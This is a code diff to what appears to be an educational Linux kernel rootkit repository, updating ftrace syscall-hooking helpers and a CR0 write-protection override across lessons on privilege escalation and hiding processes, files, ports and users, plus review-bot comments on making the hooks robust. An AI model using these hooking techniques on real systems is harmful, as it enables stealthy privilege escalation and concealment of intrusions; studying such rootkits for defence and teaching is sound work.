diff --git a/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c b/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c
index c7a8f11..fd28767 100644
--- a/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c
+++ b/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c
@@ -61,7 +61,7 @@
 * the WP bit, so we write our own instead */
 inline void cr0_write(unsigned long cr0)
 {
- asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
+ asm volatile("mov %0,%%cr0" : "+r"(cr0) : : "memory");
 }
 /* Bit 16 in the cr0 register is the W(rite) P(rotection) bit which
diff --git a/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h b/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h
index 1624ce4..ab74ace 100644
--- a/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h
+++ b/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h
@@ -78,8 +78,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -112,7 +113,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
diff --git a/3_RootkitTechniques/3.2_kill_signalling/rootkit.c b/3_RootkitTechniques/3.2_kill_signalling/rootkit.c
index 416f275..bc69385 100644
--- a/3_RootkitTechniques/3.2_kill_signalling/rootkit.c
+++ b/3_RootkitTechniques/3.2_kill_signalling/rootkit.c
@@ -60,6 +60,7 @@
 {
 return orig_kill(regs);
 }
+ return -999;
 }
 #else
 /* This is the old way of declaring a syscall hook */
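Review bot: The new `"memory"` clobber in cr0_write() (3.1_syscall_hooking/rootkit.c) has no comment, and the comment above the function only explains why the kernel's own write_cr0() is avoided. A one-line comment such as `/* "memory" clobber keeps the compiler from moving memory accesses across the CR0 write; it takes the place of the old "+m"(__force_order) operand */` would tell a reader why the operand list changed.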
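Review bot: In fh_ftrace_thunk() (3.2_kill_signalling/ftrace_helper.h) the result of `ftrace_get_regs(fregs)` is stored without a check, although that helper returns NULL when the full register set was not saved for the call. The rest of the function lies outside the hunk and presumably dereferences `regs`, so a guard such as `if (!regs) return;` placed after the declarations would turn a kernel NULL dereference into a skipped callback. The signature change is also unconditional, so the header now builds only against kernels whose ftrace callback takes `struct ftrace_regs *` (5.11 and later, as far as I know); a comment stating that minimum version would make this explicit. The identical hunks in 3.3_set_root through 3.9_hiding_logged_in_users have the same two gaps.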
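Review bot: Swapping `FTRACE_OPS_FL_RECURSION_SAFE` for `FTRACE_OPS_FL_RECURSION` in the flags assignment (3.2_kill_signalling/ftrace_helper.h, presumably inside fh_install_hook()) is not a rename: the old flag told ftrace that the callback handles recursion itself, while the new one asks ftrace to add its own recursion protection around the callback. The comment ending in `(see USE_FENTRY_OFFSET)` starts outside the hunk, but it appears to describe the helper's own recursion handling, so keeping the previous behaviour would mean leaving the flag out, `hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS | FTRACE_OPS_FL_IPMODIFY;`. If the extra protection is intended, that comment should be updated to say so. The same applies to the matching hunks in 3.3 through 3.9.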
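Review bot: The added `return -999;` after the `else` block that calls `orig_kill(regs)` (3.2_kill_signalling/rootkit.c) returns a value that is not a kernel errno, so a caller that ever received it would see an undefined error number. Only the `else` branch is visible in the hunk; if the matching `if` branch also returns, the line is unreachable and only silences a missing-return warning, which a comment should state. In either case a defined code reads better, for example `return -EINVAL;`.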
diff --git a/3_RootkitTechniques/3.3_set_root/ftrace_helper.h b/3_RootkitTechniques/3.3_set_root/ftrace_helper.h
index 808453d..ed2d8cd 100644
--- a/3_RootkitTechniques/3.3_set_root/ftrace_helper.h
+++ b/3_RootkitTechniques/3.3_set_root/ftrace_helper.h
@@ -92,8 +92,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -126,7 +127,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
diff --git a/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h b/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h
index 808453d..ed2d8cd 100644
--- a/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h
+++ b/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h
@@ -92,8 +92,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -126,7 +127,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
diff --git a/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h b/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h
index 808453d..ed2d8cd 100644
--- a/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h
+++ b/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h
@@ -92,8 +92,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -126,7 +127,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
diff --git a/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h b/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h
index 808453d..ed2d8cd 100644
--- a/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h
+++ b/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h
@@ -92,8 +92,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -126,7 +127,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
diff --git a/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h b/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h
index 808453d..ed2d8cd 100644
--- a/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h
+++ b/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h
@@ -92,8 +92,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -126,7 +127,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
diff --git a/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h b/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h
index 808453d..ed2d8cd 100644
--- a/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h
+++ b/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h
@@ -92,8 +92,9 @@
 }
 /* See comment below within fh_install_hook() */
-static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs)
 {
+ struct pt_regs *regs = ftrace_get_regs(fregs);
 struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
 #if USE_FENTRY_OFFSET
@@ -126,7 +127,7 @@
 * (see USE_FENTRY_OFFSET). */
 hook->ops.func = fh_ftrace_thunk;
 hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
- | FTRACE_OPS_FL_RECURSION_SAFE
+ | FTRACE_OPS_FL_RECURSION
 | FTRACE_OPS_FL_IPMODIFY;
 err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);